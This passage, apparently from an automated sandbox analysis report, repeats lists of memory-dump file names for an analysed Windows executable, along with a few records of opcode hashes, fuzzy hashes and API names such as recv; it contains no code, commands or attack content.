                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_850000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: recv
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1507349165-0
                                                                                                                                                                                                                                                                • Opcode ID: 48ecbadeb12ec0ffd1357e90600b4b77b5cc7d5ce5d908677d0fc0d2ee3a3c6f
                                                                                                                                                                                                                                                                • Instruction ID: fd03fa27366a312eebed503f795dc6c24d3594e0b3fc69e46da1b2a309cebf6a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48ecbadeb12ec0ffd1357e90600b4b77b5cc7d5ce5d908677d0fc0d2ee3a3c6f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E931B371A406489FDB24CB6CDC81BEB7BACFB08725F040625F915E73D1DA74A949CBA0
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_850000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
                                                                                                                                                                                                                                                                • Instruction ID: 3ae48b2f047e7400cf7bcc9142daa33310333a486f4b070db3276ac969e3be8d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2BF12E71E012199FDF14DFA9C8806ADB7B1FF88314F298269E919EB345D731AE41CB90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetSystemTimePreciseAsFileTime.KERNEL32(?,0086CF52,?,00000003,00000003,?,0086CF87,?,?,?,00000003,00000003,?,0086C4FD,00852FB9,00000001), ref: 0086CC03
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_850000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Time$FilePreciseSystem
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1802150274-0
                                                                                                                                                                                                                                                                • Opcode ID: 2e2a57227eb0f5b7d74c46097156ae1a62f94f48ed520b22bf5f9e6ad463e2c7
                                                                                                                                                                                                                                                                • Instruction ID: 706c85a1698658b33e5a53725fce13a1f2baf80c689c6470c3b47c36b782f8a8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e2a57227eb0f5b7d74c46097156ae1a62f94f48ed520b22bf5f9e6ad463e2c7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96D0123674263C97CA562B94EC089FDBB58FB05B54B060152EA0D97624CE526C405BE5
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_850000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                                                                                                                                                                                                                                • Instruction ID: 2104576f6b70b9b07654635699bd093da5b488e5c0ddf75bdac471a24cc8d12c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6516030608A4CDADB38B62D8895BBE77A6FF11304FA4051DE642D7292CE76ED4DC352
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
